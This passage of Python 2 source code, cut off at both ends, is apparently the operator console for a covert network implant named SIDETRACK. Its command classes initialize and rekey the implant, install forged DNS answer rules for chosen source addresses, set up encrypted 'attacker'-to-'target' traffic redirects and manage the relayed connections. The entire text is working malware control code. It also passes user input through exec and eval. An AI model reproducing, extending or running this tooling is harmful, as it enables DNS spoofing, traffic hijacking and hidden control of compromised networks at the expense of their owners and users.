except:
base.redir.delete(rule)
sock.close()
sock = None
#if conn != None:
# conn.close()
if localRedir != None:
localRedir.remove()
if prevRule != None:
prevRule.remove()
if tempRule != None:
tempRule.remove()
base.sessionDict[self.implant.session.name] = None
return (1,"Canceled by user, target %s removed" % self.implant.session.name)
sock.close()
sock = None
# Set the CC redirect to inactive. This will not effect the
# current connection..only prevent the rule from getting in the way
if prevRule != None:
prevRule.set(0)
#if there is a connection back return 1 else 0
if self.implant.protocol.sock:
cmd = self.implant.session.GetCommand("init")
res = cmd.run()
# remove the temporary redirect
if tempRule != None:
tempRule.remove()
# remove the connection rule
base.redir.delete(rule)
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
return (1, "Connected")
else:
# remove the temporary redirect
if tempRule != None:
tempRule.remove()
# remove the connection rule
base.redir.delete(rule)
return (0, "Could not connect")
##########################################################################
# INIT class
# op code: 0x20
#########################################################################
class SIDECMD_INIT(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "init"
self.usage = "init"
self.info = "Initialize the implant"
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
cmd = self.implant.session.GetCommand("ping")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
for i in range(3):
cmd = self.implant.session.GetCommand("rekey")
res = cmd.run()
if res[0] != 0:
break
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
cmd = self.implant.session.GetCommand("switchkey")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
cmd = self.implant.session.GetCommand("status")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
return (1,"Initialization complete")
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsload"
self.usage = "dnsload <filename>"
self.info = "Send DNS data from a file to the target"
#-------------------------------------------------------------------------
# Name : ProcessArg
# Purpose: Tests to see if the argument is a string or number
# Receive: arg - The argument to test
# Return : The original string if a number, or a quoted string if not
#-------------------------------------------------------------------------
def ProcessArg(self,arg):
if (re.match('^-?[0-9]*(\.[0-9]+)?$',arg) != None or \
re.match('^0x[0-9a-fA-F]+L?', arg) != None):
return arg
else:
return '"' + arg + '"'
def runRule(self, args):
cmd = SIDECMD_DNSADD()
cmd.implant = self.implant
argString = 'myRes = cmd.run('
for i in range(1,len(args)):
if i == 1:
argString = argString + self.ProcessArg(args[i])
else:
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
if myRes and myRes[0]:
self.lastRule = myRes[0]
def runSet(self, args):
cmd = SIDECMD_DNSSET()
cmd.implant = self.implant
argString = 'myRes = cmd.run(self.lastRule'
for i in range(1,len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def runCmd(self, args):
cmd = SIDECMD_DNSACTION()
cmd.implant = self.implant
argString = 'tmp = cmd.run(self.lastRule'
for i in range(len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def run(self, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
file = open(filename,'r')
self.lastRule = 0
while 1:
line = file.readline()
if not line:
line = None
return (1, "Input from file complete")
args = base.SplitCommandString(string.strip(line))
if len(args) == 0:
continue
elif args[0][0:1] == '#' or args[0] == '':
continue
elif args[0] == "rule":
self.runRule(args)
print "Rule %d added\n" % (self.lastRule)
elif args[0] == "set":
self.runSet(args)
else:
self.runCmd(args)
return (0, "problem")
##########################################################################
# DNSADD class
# op code: 0x18
#########################################################################
class SIDECMD_DNSADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsadd"
self.usage = "dnsadd <from ip> <from mask> <longevity> <type> <class> <name> [dns flags]"
self.info = "Add a DNS entry into sidetrack (see also dnsset)"
self.op = 0x18L
def run(self,ip,mask,length,rtype,rclass,name,flags=0x0080L):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
ipStr = self.ConvertIP(ip)
maskStr = self.ConvertIP(mask)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
name = self.ConvertName(name)
length = self.ConvertTime(length)
self.data = ipStr + maskStr + struct.pack("!LHHHH",length,flags,\
rtype,rclass,len(name)) +name
self.Query()
if( self.op == 0x18L and self.res == 0x1L ):
dnsRes = struct.unpack("!l",self.data[0:4])[0]
return (dnsRes, "Add successful, rule number: %d" % dnsRes)
else:
return (0, "Add failed")
##########################################################################
# DNSREMOVE class
# op code: 0x19
#########################################################################
class SIDECMD_DNSREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsrm"
self.usage = "dnsrm <rule|all>"
self.info = "Remove a dns rule"
self.op = 0x19L
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!l",rule)
self.Query()
if self.op == 0x19L and self.res == 0x01L:
return (1,"Rule(s) removed")
else:
return (0,"unable to remove rule(s)")
##########################################################################
# DNSSET class
# op code: 0x20
#########################################################################
class SIDECMD_DNSSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsset"
self.usage = "dnsset <rule> <ignore|count|active>"
self.info = "Turn a DNS rule on or off"
self.op = 0x20L
def run(self,rule,onoff):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.data = struct.pack("!l",rule)
if onoff[0:1] == "a" or onoff[0:1] == "A":
self.data = self.data + struct.pack("!h", 2)
elif onoff[0:1] == "c" or onoff[0:1] == "C":
self.data = self.data + struct.pack("!h", 1)
else:
self.data = self.data + struct.pack("!h", 0)
self.Query()
if self.op == 0x20L and self.res == 0x01L:
return (1,"rule %d successfully set to %s" %\
(rule, onoff))
else:
return (0,"unable to set rule to %s" % onoff)
##########################################################################
# DNSRAW class
# op code: 0x21
#########################################################################
class SIDECMD_DNSRAW(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsraw"
self.info = "Upload a binary dns response packet"
self.usage = "dnsraw <rule> <filename>"
self.op = 0x21L
def run(self, rule, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0, msg)
file = open(filename,'r')
file.seek(0,2)
filesize = file.tell()
file.seek(0,0)
maxchunksize = self.implant.packetSize - 34
numchunks = filesize / maxchunksize
if filesize%maxchunksize > 0:
numchunks = numchunks + 1
for i in range(numchunks):
self.data = file.read(maxchunksize)
self.data = struct.pack("!LHHHH",rule,i,numchunks,4,\
len(self.data)) + self.data
self.Query()
if (self.op != 0x21L or self.res != 0x1L):
return (0,"Binary upload failed at chunk %d"%(i+1))
return (1,"Binary upload of %d chunks successful"%(numchunks))
##########################################################################
# DNSACTION class
# op code: 0x21
#########################################################################
class SIDECMD_DNSACTION(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsaction"
self.info = "Set the action for a rule"
self.usage = "dnsaction <rule> <ans|auth|add> <name> <type> <class> <ttl> <data>"
self.op = 0x21L
def run(self,rule,sect,name,rtype,rclass,ttl,data):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
name = self.ConvertName(name)
sect = self.ConvertSection(sect)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
ttl = self.ConvertTime(ttl)
if rtype == 1:
data = self.ConvertIP(data)
else:
data = self.ConvertName(data)
self.data = struct.pack("!LLHHHHH", rule, ttl, sect, rtype,\
rclass,\
len(name),\
len(data))+\
name+data
self.Query()
if self.op == 0x21L and self.res == 0x01L:
return (1,"%s action for rule %d set successfully" % \
(sect, rule))
else:
return (0,"Could not set action")
##########################################################################
# DNSLIST class
# op code: 0x22
#########################################################################
class SIDECMD_DNSLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnslist"
self.usage = "dnslist [-v] [rule] [section]"
self.info = "Retrieve a section of a rule from SIDETRACK"
self.op = 0x22L
def ParseReturn(self):
if self.implant.version < 2.0:
self.lastport = 0
(self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
self.lastIP, self.lastTime, self.seen, self.flag, self.ttl, \
self.dnsflags, self.rtype, self.rclass, self.rsec, \
self.nlen, self.dlen) =\
struct.unpack("!lLLLLLLHHLHHHHHH", self.data[0:48])
self.dnsname = self.data[48:48+(self.nlen)]
self.dnsdata = self.data[48+(self.nlen):48+(self.nlen)+(self.dlen)]
else:
(self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
self.lastIP, self.lastTime, self.seen, self.flag, self.lastport, \
self.dnsflags, self.ttl, self.rtype, self.rclass, self.rsec, \
self.nlen, self.dlen) =\
struct.unpack("!lLLLLLLHHHHLHHHHH", self.data[0:50])
self.dnsname = self.data[50:50+(self.nlen)]
self.dnsdata = self.data[50+(self.nlen):50+(self.nlen)+(self.dlen)]
def GetRuleString(self):
printOut = "%10d %s/%s %-7s %s\n" % \
(self.rule,
self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.FlagConvert(self.flag),
time.ctime(self.longevity+self.implant.timediff)[4:])
printOut = printOut + " %5s: %-5d %s:%d %s\n" %\
("count",
self.seen,
self.ConvertToDot(self.lastIP),
self.lastport,
time.ctime(self.lastTime + self.implant.timediff))
return printOut + self.GetSectionString()
def GetRule(self,rule,sec=0):
sec = self.ConvertSection(sec)
#print "Getting section %d of rule %d\n" % (sec,rule)
self.data = struct.pack("!LLH",rule,0,sec)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
printOut = self.GetRuleString()
return (1, printOut)
else:
return (0,"Error receiving result\n")
def GetNextRule(self,lastRule,sec=0):
sec = self.ConvertSection(sec)
print "Getting section %d of rule after %d\n" % (sec,lastRule)
self.data = struct.pack("!LLH",0,lastRule,sec)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
if self.retVal == 0:
lastRule = self.rule
elif self.retVal == 2:
lastRule = -2
else:
lastRule = -1
if lastRule == -2:
lastRule = -1
printOut = 'There are currently no rules'
else:
printOut = self.GetRuleString()
return (lastRule, printOut)
elif lastRule == 0:
print self.res
return (0,"There are currently no rules!")
else:
return (0,"Error receiving result\n")
def GetSectionString(self):
printOut = " %5s: %-5s %-3s %-5d " % \
(self.SectionConvert(self.rsec),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.nlen:
try:
printOut = printOut + "%s\n" % \
(self.NameConvertName(self.dnsname))
except:
printOut = printOut + "\n N: %s\n" %\
(self.HexConvert(self.dnsname,10))
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + \
" D: %s\n" % \
(self.ConvertToDot(self.dnsdata))
else:
printOut = printOut + \
" D: %s\n" %\
(self.NameConvert(self.dnsdata,10))
return printOut
def GetSection(self,rule,section):
print "Getting section %d of rule %d\n" % (section,rule)
self.data = struct.pack("!LLH",rule,0,section)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
if self.rsec == 4:
return (1, '')
return (1,self.GetSectionString())
else:
return (0, "Could not get section")
def preRuleString(self):
return "-----------------------------------------------------------------------\n"
def postRuleString(self):
return ''
def runAll(self):
moreRules = 1
lastRule = 0
printOut = ''
while moreRules:
res = self.GetNextRule(lastRule)
if res[0] == 0:
return res
elif res[0] == -1:
moreRules = 0
lastRule = self.rule
else:
lastRule = res[0]
printOut = printOut + self.preRuleString()
printOut = printOut + res[1]
for i in range(1,4):
sec = self.GetSection(lastRule, i)
if sec[0] == 0:
return (0, printOut)
printOut = printOut + sec[1]
printOut = printOut + self.postRuleString()
return (1, printOut)
def run(self,rule=-1, sec=-1, ext=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1:
lastRule = 0
moreRules = 1
printOut = ''
while moreRules:
res = self.GetNextRule(lastRule)
if res[0] == 0:
return res
elif res[0] == -1:
moreRules = 0
lastRule = self.rule
else:
lastRule = res[0]
printOut = printOut + res[1]
elif rule == "-v":
if sec == -1:
return self.runAll()
else:
if ext == -1:
res = self.GetRule(sec)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(sec, i)
if sd[0] == 0:
return (0, printOut)
printOut = printOut + sd[1]
else:
return self.GetRule(sec,ext)
else:
if sec == -1:
return self.GetRule(rule)
else: # Rule != 0 and sec != -1
return self.GetRule(rule,sec)
return (1,printOut)
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSSAVE(SIDECMD_DNSLIST):
def __init__(self):
SIDECMD_DNSLIST.__init__(self)
self.name = "dnssave"
self.usage = "dnssave [rule] [filename]"
self.info = "Save one of more rules"
def ToOct(self, data):
if type(data) == type(0x0L) or type(data) == type(0):
ret = ''
if data > 255:
if data > 65535:
if data > 16777215:
ret = ret + "\\%o" % ((int)(data/16777216)&0xffL)
ret = ret + "\\%o" % ((int)(data/65536)&0xffL)
ret = ret + "\\%o" % ((int)(data/256)&0xffL)
ret = ret + "\\%o" % (data & 0xffL)
else:
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
for i in range(len(data)):
if reg.match(data[i:i+1]) != None:
ret = ret + data[i:i+1]
else:
ret = ret + "\\%o" % \
struct.unpack("!H",'\000'+data[i:i+1])[0]
return '"' + ret + '"'
def NameConvertName(self, name):
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
if reg.match(name[sp+i:sp+i+1]) != None:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.ToOct(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.ToOct(name)
def GetSectionString(self):
printOut = "%s %s %s %s %d " % \
(self.SectionConvert(self.rsec),
self.NameConvert(self.dnsname),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + self.ConvertToDot(self.dnsdata)
else:
printOut = printOut + self.NameConvert(self.dnsdata,10)
return printOut + '\n'
def GetRuleString(self):
printOut = "rule %s %s %d %s %s %s 0x%04x\n" % \
(self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.longevity - self.rule,
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.NameConvert(self.dnsname),
self.dnsflags)
return printOut
def preRuleString(self):
return "# -----------------------------------------------------------------------\n"
def postRuleString(self):
return "set %s\n" % (self.FlagConvert(self.flag))
def run(self,rule=-1, file=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1: # All Rules to stdout
return self.runAll()
elif type(rule) == type(''): # All rules to file
out = open(rule,'w')
res = self.runAll()
if res[0] == 0:
return res
out.write(res[1])
out = None
return res
elif file == -1: # Single rule to stdout
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
return (1,printOut + self.postRuleString())
else: # Single rule to file
out = open(file,"w")
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
printOut = printOut + self.postRuleString()
out.write(printOut)
out = None
return (1,printOut)
#############################################################################
# REDIRADD class
# opcode 0x23
#############################################################################
class SIDECMD_REDIRADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "rediradd"
self.usage = "rediradd <protocol | all> <host_A> <host_B> [-insert <rule>]\n [-ttl (reset | <num>)] [-nocrypto] [-afix] [-tfix] [-samesum]\n [-longevity <time>] [-conntimeout <time>]\n\n <host_A>/<host_B> format: <ip_address>[:<local_port>/<remote_port>]\n"
self.info = "Add a REDIRECT rule into SIDETRACK's rule set"
self.op = 0x23L
def parseProto(self,proto):
origproto = proto
if type(proto) == type ('a'):
proto = string.upper(proto)[:1]
if proto == "T":
proto = 6
elif proto == "U":
proto = 17
elif proto == "I":
proto = 1
elif proto == "A":
proto = 0
else:
raise ValueError, origproto
return proto
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,-1,-1
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) != 2:
raise ValueError, host
if ports[0] == "*":
ports[0] = -1
else:
ports[0] = eval(ports[0])
if ports[1] == "*":
ports[1] = -1
else:
ports[1] = eval(ports[1])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0],ports[1]
else:
raise ValueError, host
def run(self,protocol,attacker,target,
opt0=None,opt1=None,opt2=None,opt3=None,opt4=None,opt5=None,
opt6=None,opt7=None,opt8=None,opt9=None,first=1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg,0)
optList = [opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9]
allProtoAT = 0
allProtoTA = 0
allRedir = 0
ttl_reset = 1
ttl_mod = 0
munge = 1
encrypt = 0
afix = 1
tfix = 1
ident = 0
seq = 0
insert = 0
samesum = 0
longevity = 14400
conn_to = 14400
cmd = None
localredir = 0
if first:
munge = 0
encrypt = 1
protocol = self.parseProto(protocol)
if protocol == 0:
allRedir = 1
host,A_ip,A_port,SA_port = self.parseHostInfo(attacker)
host2,T_ip,T_port,ST_port = self.parseHostInfo(target)
if host != None:
hpn = host.implant.parent.name
myname = host.name
attacker = re.sub(myname,hpn,attacker)
cmd = host.GetCommand('rediradd')
res = cmd.run(protocol,attacker,\
"%s:%d/%d"%(self.implant.session.target.ip,SA_port,A_port),\
opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9,0)
if res[0] == 0:
return res
if res[2] != 0 and cmd.implant.session.target.hasAnotherAddress == 1:
A_ip = struct.pack("!L",res[2])
if SA_port == -1 and T_port != -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if SA_port != -1 and T_port == -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if ST_port == -1 and A_port != -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if ST_port != -1 and A_port == -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if SA_port == -1 and T_port == -1:
allProtoAT = 1
SA_port = 0
T_port = 0
if ST_port == -1 and A_port == -1:
allProtoTA = 1
ST_port = 0
A_port = 0
# Parse the args
i=0
while i < len(optList):
if optList[i] == None:
break
elif string.upper(optList[i])[:3] == '-TT':
i = i+1
if type(optList[i]) == type(1):
ttl_mod = optList[i]
if optList[i] < 0:
ttl_reset = 0
else:
ttl_reset = 1
elif string.upper(optList[i])[:1] == 'R':
ttl_mod = 0
ttl_reset = 1
elif optList[i][0] == '+' or optList[i][0] == '-':
ttl_mod = eval(optList[i])
ttl_reset = 0
else:
raise ValueError, optList[i]
#if ttl_reset == 0:
# ttl_mod = struct.pack("!H",ttl_mod)
#else:
# ttl_mod = struct.pack("!h",ttl_mod)
elif string.upper(optList[i])[:2] == '-I':
i = i+1
insert = optList[i]
elif string.upper(optList[i])[:2] == '-L':
i = i+1
longevity = self.ConvertTime(optList[i])
elif string.upper(optList[i])[:2] == '-C':
i = i+1
conn_to = self.ConvertTime(optList[i])
elif string.upper(optList[i])[:2] == '-N':
munge = 0
encrypt = 0
elif string.upper(optList[i])[:2] == '-E':
encrypt = 1
elif string.upper(optList[i])[:2] == '-A':
afix = 0
elif string.upper(optList[i])[:3] == '-TF':
tfix = 0
elif string.upper(optList[i])[:2] == '-S':
samesum = 1
else:
raise ValueError, optList[i]
i = i + 1
if T_ip == self.ConvertIP(self.implant.session.target.ip):
encrypt = 0
munge = 0
localredir = 1
flags = 1 | afix << 1 | tfix << 2 | ttl_reset << 3 \
| encrypt << 4 | munge << 5 | allRedir << 6 | allProtoAT << 7 \
| allProtoTA << 8 | base.ccSupport << 9 | samesum << 10
rd = crypto.GetRandom()
if localredir == 0:
ident = struct.unpack("!H",rd[0:2])[0]
if munge:
munge = struct.unpack("!L",rd[2:6])[0]
if munge & 1L == 0:
munge = munge + 1
if munge & 0xffL == 1:
munge = munge + 10
if protocol == 6 and localredir == 0 and encrypt:
seq = struct.unpack("!L", rd[22:26])[0]
if encrypt:
encrypt = struct.unpack("!LLLL",rd[6:22])
else:
encrypt = (0,0,0,0)
base.db(2, seq)
base.db(2, ident)
self.redir =REDIRECT(self,insert,longevity,conn_to,protocol,A_ip,T_ip,\
ident,seq,munge,encrypt,ttl_mod,flags,\
A_port,SA_port,T_port,ST_port)
ruleRes = self.redir.add()
if ruleRes[0] and cmd != None:
if cmd.redir != None:
cmd.redir.next = self.redir
self.redir.prev = cmd.redir
return ruleRes
#############################################################################
# REDIRLIST class
# opcode 0x24
#############################################################################
class SIDECMD_REDIRLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirlist"
self.usage = "redirlist [rule]"
self.info = "List redirect entries."
self.op = 0x24L
def parseReturn(self):
self.ret, self.rule, self.longevity, self.conn_to, \
self.A_ip, self.T_ip, self.flags = \
struct.unpack("!LLLLLLH",self.data[:26])
self.ttl_mod = struct.unpack("!H",'\000'+self.data[26:27])[0]
self.protocol = struct.unpack("!H", '\000'+self.data[27:28])[0]
self.conns, self.ATcount, self.TAcount, self.seen, self.munge, \
self.A_port, self.SA_port, self.T_port, self.ST_port, \
self.seq = struct.unpack("!LLLLLHHHHL",self.data[28:60])
self.A_ip = self.ConvertToDot(self.A_ip)
self.T_ip = self.ConvertToDot(self.T_ip)
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
if self.protocol == 1:
self.protocol = "ICMP"
elif self.protocol == 6:
self.protocol = "TCP"
elif self.protocol == 17:
self.protocol = "UDP"
elif self.protocol == 0:
self.protocol = "ALL"
else:
self.protocol = eval("'%d'" % (self.protocol))
if (self.flags & 0x1L):
self.active = "ACTIVE"
else:
self.active = "INACTIVE"
self.opts = ''
if not (self.flags & 0x2L):
self.opts = self.opts + '-afix '
if not (self.flags & 0x4L):
self.opts = self.opts + '-tfix '
if (self.flags & 0x400L):
self.opts = self.opts + '-samesum '
if self.flags & 0x8L:
if self.ttl_mod == 0:
self.opts = self.opts + '-ttl reset '
else:
self.opts = self.opts + '-ttl %d ' % (self.ttl_mod)
else:
if self.ttl_mod > 127:
self.opts = self.opts + '-ttl %d' % (self.ttl_mod-256)
else:
self.opts = self.opts + '-ttl +%d ' % (self.ttl_mod)
if not (self.flags & 0x30L):
self.opts = self.opts + '-nocrypto '
def outputPorts(self,attacker,flags,ip,lport,rport):
if flags & 0x40 or flags & 0x180 == 0x180:
return ip
if attacker and flags & 0x80:
rport = '*'
if attacker and flags & 0x100:
lport = '*'
if not attacker and flags & 0x80:
lport = '*'
if not attacker and flags & 0x100:
rport = '*'
if type(lport) != type('*'):
lport = '%d' %(lport)
if type(rport) != type('*'):
rport = '%d' %(rport)
return '%s:%s/%s' % (ip,lport,rport)
def outputCurrent(self):
res = '%-5d %s Connection timeout: %s Expires: %s\n' % \
(self.rule,self.active,\
self.TimeConvert(self.conn_to),self.longevity)
res = res + ' %s %s %s %s\n' % \
(self.protocol,
self.outputPorts(1,self.flags,self.A_ip,self.A_port,self.SA_port),
self.outputPorts(0,self.flags,self.T_ip,self.T_port,self.ST_port),
self.opts)
res = res + ' Connections: %-4d Last seen %s\n A->T count: %-6d T->A count: %-6d\n' % (self.conns, time.ctime(self.seen-self.implant.timediff)[4:], self.ATcount, self.TAcount)
return (1, res)
def listOne(self,rule):
self.data = struct.pack("!LL",rule,0)
self.Query()
if self.op == 0x24L and self.res == 0x01L:
self.parseReturn()
return self.outputCurrent()
else:
return (0, "Implant did not return a valid response")
def listAll(self):
out = ''
self.ret = 1
self.rule = 0
while self.ret == 1:
self.data = struct.pack("!LL",0,self.rule)
self.Query()
if self.op == 0x24L and self.res == 0x01L:
self.parseReturn()
res = self.outputCurrent()
if res[0] == 0:
return res
else:
out = out + res[1]
else:
return (0, "Error receiving result")
if self.ret == 2:
return (1, "No rules to list")
else:
return (1, out)
def run(self,rule=None):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if rule == None:
res = self.listAll()
else:
res = self.listOne(rule)
return res
#############################################################################
# REDIRSET class
# opcode 0x25
#############################################################################
class SIDECMD_REDIRSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirset"
self.usage = "redirset <rule|all> <active|inactive>"
self.info = "Set a redirect rule as being active or inactive."
self.op = 0x25L
def run(self, rule, status):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
if string.upper(status[:1]) == 'A':
status = 1
elif string.upper(status[:1]) == 'I':
status = 0
i=0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].set(status)
if res[0] == 0:
return res
elif rule != 0:
break
i = i + 1
base.db(3,res[1])
if i == len(self.implant.rules) and rule != 0:
return (0, "Rule does not exist")
else:
return (1, "Rule(s) set successfully")
#############################################################################
# CONNREMOVE class
# opcode 0x28
#############################################################################
class SIDECMD_CONNREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connrm"
self.usage = "connrm <rule|all>"
self.info = "Remove a connection entry (or all connection entries)"
self.op = 0x28L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x28L and self.res == 0x1L:
return (1, "Connection(s) removed successfully")
else:
return (0, "Error removing connection(s)")
#############################################################################
# CONNLIST class
# opcode 0x27
#############################################################################
class SIDECMD_CONNLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connlist"
self.usage = "connlist [-c <rule> | -r <redir>]"
self.info = "Lists a (or all) connection rules"
self.op = 0x27L
def convertState(self,state):
if state == 0:
return "INIT"
elif state == 1:
return "SYN_SENT"
elif state == 2:
return "SYN_RCVD"
elif state == 3:
return "SYN_ACK_RCVD"
elif state == 4:
return "SYN_ACK_SENT"
elif state == 5:
return "ESTABLISHED"
elif state == 6:
return "FIN_SENT"
def parseReturn(self):
self.ret,self.rule,self.redir,self.longevity = struct.unpack("!LLLL",self.data[0:16])
self.protocol = struct.unpack("!H", '\000'+self.data[16:17])[0]
sendstate = struct.unpack("!H",'\000'+self.data[17:18])[0]
recvstate = struct.unpack("!H",'\000'+self.data[18:19])[0]
sender = struct.unpack("!H",'\000'+self.data[19:20])[0]
self.at_cnt, self.ta_cnt, self.last, self.Aip, self.SAip, self.Tip,\
self.STip, self.Aport, self.SAport, self.Tport, self.STport \
= struct.unpack("!LLLLLLLHHHH",self.data[20:56])
self.leftState = ''
self.rightState = ''
if self.protocol == 6:
self.protocol = "TCP"
if sender == 1:
self.leftState = self.convertState(sendstate)
self.rightState = self.convertState(recvstate)
else:
self.leftState = self.convertState(recvstate)
self.rightState = self.convertState(sendstate)
elif self.protocol == 17:
self.protocol = "UDP"
else:
self.protocol = '%d' %(self.protocol)
def outputCurrent(self):
res = '%d %s Redir rule: %d Last seen: %s\n %s:%d <-%s(%d)-> %s:%d\n %s:%d <-%s(%d)-> %s:%d\n' % \
(self.rule,self.protocol,self.redir,
time.ctime(self.last+self.implant.timediff)[4:],
self.ConvertToDot(self.Aip),self.Aport,
self.leftState,self.at_cnt,
self.ConvertToDot(self.SAip),self.SAport,
self.ConvertToDot(self.STip),self.STport,
self.rightState,self.ta_cnt,
self.ConvertToDot(self.Tip),self.Tport)
return (1,res)
def listAll(self,redir):
out = ''
self.ret = 1
self.rule = 0
while self.ret == 1:
self.data = struct.pack("!LLL",0,self.rule,redir)
self.Query()
if self.op == 0x27L and self.res == 0x01L:
self.parseReturn()
res = self.outputCurrent()
if res[0] == 0:
return res
else:
out = out + res[1]
else:
return (0, "Error receiving result")
if self.ret == 2:
return (1,"No connections to list")
else:
return (1,out)
def listOne(self,rule):
self.data = struct.pack("!LLL",rule,0,0)
self.Query()
if self.op == 0x27L and self.res == 0x01L:
self.parseReturn()
return self.outputCurrent()
else:
return (0, "Implant did not return a valid response")
def run(self, option=None, value=None):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
rule = 0
redir = 0
if option != None:
if option == '-c':
rule = value
elif option == '-r':
redir = value
else:
raise TypeError, option
if rule == 0:
res = self.listAll(redir)
else:
res = self.listOne(rule)
return res
#############################################################################
# REDIRREMOVE class
# opcode 0x26
#############################################################################
class SIDECMD_REDIRREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirrm"
self.usage = "redirrm <rule|all>"
self.info = "Remove a redirect rule (or all redirect rules)"
self.op = 0x26L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
